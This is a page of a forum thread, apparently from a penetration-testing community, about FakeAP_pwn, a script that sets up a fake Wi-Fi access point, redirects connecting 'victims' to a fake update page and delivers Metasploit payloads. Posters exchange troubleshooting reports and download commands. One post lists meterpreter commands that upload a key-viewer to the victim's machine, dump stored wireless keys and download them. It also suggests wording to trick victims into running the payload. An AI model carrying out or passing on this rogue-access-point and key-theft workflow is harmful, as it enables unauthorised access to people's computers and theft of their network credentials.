Page 11 of 19 FirstFirst ... 910111213 ... LastLast
Results 101 to 110 of 185

Thread: [Script] [Video] FakeAP_pwn (v0.2.1)

  1. #101
    Member joker5bb's Avatar
    Join Date
    Feb 2010
    Posts
    166

    Default Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    get the latest revision by:
    Code:
    svn export http://fakeap-pwn.googlecode.com/svn/trunk/fakeAP_pwn.sh fakeAP_pwn.sh
    see if this works without making changes, I disabled SSlstrip for now

    *also get the latest version of dhcp3-server (3.1.3) from ubuntu
    Last edited by joker5bb; 07-10-2010 at 04:58 PM.

  2. #102
    Member
    Join Date
    Mar 2010
    Location
    Somewhere in CA
    Posts
    98

    Default Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    Still seems to be working great, minus uploading which I believe is prolly an issue with my card.

    timed it, 10 minutes and still nothing
    Last edited by slowz3r; 07-10-2010 at 05:44 PM.

  3. #103
    Just burned his ISO
    Join Date
    Jul 2010
    Posts
    17

    Default Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    Nope, no N capability on my hosting card, What N cards are you connecting with? Mine is a DW1525 in a Dell desktop
    I'm connecting with a D-Link DWA-130 wireless-N dongle. Also, when I connect to the AP with my G card, I don't even have to touch network location for connectivity, its instant regardless.

    Progress report for 0.3-RC13 -
    Same results I posted for RC10 when it comes to signal strength, ping times, etc.

    -DHCP has been upgraded to 3.1.3 (slightly faster with my G card, otherwise no difference)

    DWA-130(wireless-N) - No connectivity with DHCP server at all on this card, no IP / network access at all.
    WG111v3(wireless-G) - Instant connectivity with DHCP, website redirection working, both download links working, Neither VNC/SBD progress past the output below..


    ^ Haven't been able to pass this point at all since resolving other issues, I'm not a big ruby guy so help/advice would be appreciated..

  4. #104
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    Newest version...
    fakeAP_pwn-v0.3-RC16.tar.gz
    [OUT OF DATE]

    *this is the last time you will need to download from mediafire!*
    Next time...to update:
    Code:
    bash fakeAP_pwn.sh -u
    Last edited by g0tmi1k; 07-31-2010 at 11:37 AM.
    Have you...g0tmi1k?

  5. #105
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    I'm going to start off and just say...WOW! Thanks everyone! (=
    Quote Originally Posted by kernel831 View Post
    Another progress report for you.. running 0.3-RC10..

    * Your WiFi card + driver = alfa card, rtl8187
    * Your kernel version = FRESH install of bt4 w/ 2.6.30.9
    * Signal strength of the AP = 100%
    * The time it takes to ping the AP = avg 23 MS
    * The time it takes to ping google.com when connect to the fakeAP =avg 63 MS
    *Output: No Errors
    * MTU set to match my card / router at 1500.
    * There is some definite inconsistency with DHCP, although after tweaking I'm successfully dishing out IP with no problem.
    *The forced website redirection, download link (mirror link only, update.microsoft.com link times out), and apache servers downloads all work flawlessly on XP.

    As for the exploit, both VNC and SBD are failing for me, It gets to the point of executing the .rb script.. below is the output. It never passes this...


    As a note, still no AVs or firewalls on the hosts, and cache/cookies is cleared out before any of my tests. No connection, remote destop, or remote command line is made. Good luck and great work so far.

    Modifications to 0.3-RC10 - Commented out Line #547
    Code:
    #iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    EDIT(Important) - I believe that I may have found the variable giving people such scattered results with DHCP / Limited Connectivity! I continued some testing with my windows 7(x64) box trying to duplicate the results I posted above..
    I'v found that using a wireless-N adapter on the VICTIM computer will NOT be able to resolve with the DHCP server. For me, And my guess is many others, the repeated DHCP DISCOVER / DHCP OFFER requests are caused by incompatibility of the wireless-N card trying to connect with your injection/monitor mode compatible, B / G card which is serving the AP..

    When switching out my wireless-N card for a wireless-B/G card, INSTANT SUCCESS!
    Fix the DNS problem - so the both link should work!
    Updated the metasploit script - and I tested VNC, WKV - didn't do SBD...
    Thanks for the heads up about Wireless N... I'll make a note of it for the final release of v0.3
    I wouldn't of got this - as all my hardware is B/G )=

    Quote Originally Posted by slowz3r View Post
    Hmmmm, not sure if thats entirely true, it may be it some situations but in my case my Target PC is a Windows 7 X64 pc running a Wireless N card and it connects to the AP will full connectivity but it only gains "full connectivity" after selecting one of these options from the annoying pop up window in 7

    Yea, nothing can be done about the pop up...sorry!
    *idea - what if you were to "clone" (SSID and MAC) an AP that the client has been connected too - does it pop up then?*

    Quote Originally Posted by Jelly View Post
    a) It Dosent get anything, DHCP-timeout and then it sets its private ip...
    b) Full strenght
    c) Latest fakeAP_pwn v0.3-RC12 (Read the first line of the output )
    d) Probes and Join in FakeAP, Nothing expect the "default" in DHCP (I check it later)
    Cheeky. Tho thanks for the info.
    Have you...g0tmi1k?

  6. #106
    Member
    Join Date
    Mar 2010
    Location
    Somewhere in CA
    Posts
    98

    Default Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    Quote Originally Posted by g0tmi1k View Post
    I'm going to start off and just say...WOW! Thanks everyone! (=

    Yea, nothing can be done about the pop up...sorry!
    *idea - what if you were to "clone" (SSID and MAC) an AP that the client has been connected too - does it pop up then?*

    Hmm, I'll give that a try for fun, the pop up doesn't really bug me, I just never noticed a lack of connectivity because i didn't select one of those options before is all

  7. #107
    Just burned his ISO
    Join Date
    Jul 2010
    Posts
    17

    Default Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    Not sure how that network location system really works (but im sure its not too hard to figure out), But since I have been testing this over and over with the same ESSID its basically registering the network as "Free-WiFi 1, Free-WiFi 2, etc". I'm currently at like Free-WiFi 12

    This is just a guess, but considering were spoofing our mac address before we put out the AP every time, I believe that it's saving according to BSSID rather then ESSID.

    Another thing you would have to overcome for that system to work is actually know the BSSID and ESSID of the AP he's been connected to in order to change your settings accordingly. If you can somehow gather the information from the victim I think its do-able, but I think gathering that information in the first place will be very difficult.

    Ill test out the new version in a bit here and post a report later, Good luck.
    ########################################

    EDIT for progress - I have tried RC16 with the same results, everything working very efficiently up until the ruby script to connect with the payload. Same window that i posted earlier.
    Last edited by kernel831; 07-11-2010 at 08:39 PM. Reason: Additional information

  8. #108
    Member
    Join Date
    Mar 2010
    Location
    Somewhere in CA
    Posts
    98

    Default Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    Quote Originally Posted by kernel831 View Post
    Not sure how that network location system really works (but im sure its not too hard to figure out), But since I have been testing this over and over with the same ESSID its basically registering the network as "Free-WiFi 1, Free-WiFi 2, etc". I'm currently at like Free-WiFi 12

    This is just a guess, but considering were spoofing our mac address before we put out the AP every time, I believe that it's saving according to BSSID rather then ESSID.

    Another thing you would have to overcome for that system to work is actually know the BSSID and ESSID of the AP he's been connected to in order to change your settings accordingly. If you can somehow gather the information from the victim I think its do-able, but I think gathering that information in the first place will be very difficult.

    Ill test out the new version in a bit here and post a report later, Good luck.
    ########################################

    EDIT for progress - I have tried RC16 with the same results, everything working very efficiently up until the ruby script to connect with the payload. Same window that i posted earlier.
    Dont feel bad im on Free WiFi connection 26

    I think I might head to the store and pick up a different WiFi card to see if that speeds up upload cuz it shouldnt be taking 20 minutes to get no where lol

  9. #109
    Senior Member
    Join Date
    Jun 2007
    Location
    UK
    Posts
    175

    Default Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    just started testing RC16
    run with payload=wkv. client connects OK, downloads NO problems, run download and script hangs at Downloading keys (I stopped it after 10 minutes)
    Re-Run with payload=sbd every things great and I get a session at a little over 1 minute and client gets the internet.

    I have successfully downloaded the wireless keys in the meterpreter> session as follows:-
    upload /var/www/fakeAP_pwn/wkv.exe c:
    execute -f cmd -c
    interact 4 (4 is the number displayed in previous execute command)
    cd \
    c:\> wkv /stext wirekeys.txt
    exit
    download /wirekeys

    Just an idea untill the speed issue is fixed. amend index.php with some notes i.e. This update is large and may take up to 2 minutes to complete so please be patient! also add some notes/instructions about how to run the downloaded file as most victims won't have a clue after selecting the download.

  10. #110
    Member joker5bb's Avatar
    Join Date
    Feb 2010
    Posts
    166

    Default Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    guys make sure you test the latest revision so just run:
    Code:
    svn checkout http://fakeap-pwn.googlecode.com/svn/trunk/ fakeap-pwn-read-only

Page 11 of 19 FirstFirst ... 910111213 ... LastLast

Similar Threads

  1. Replies: 6
    Last Post: 10-08-2010, 11:40 PM
  2. Script help
    By isdigit in forum OLD Newbie Area
    Replies: 2
    Last Post: 08-21-2009, 02:35 AM
  3. Video: Nmap Video Tutorial 2: Port Scan Boogaloo
    By Irongeek in forum OLD Tutorials and Guides
    Replies: 0
    Last Post: 05-30-2008, 08:07 PM
  4. Video: Nmap Video Tutorial 2: Port Scan Boogaloo
    By Irongeek in forum OLD BT1, Whax and Auditor Videos
    Replies: 0
    Last Post: 05-30-2008, 08:07 PM
  5. LZM Script/lzm2dir script
    By unseen in forum OLD Tutorials and Guides
    Replies: 2
    Last Post: 11-29-2007, 02:51 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •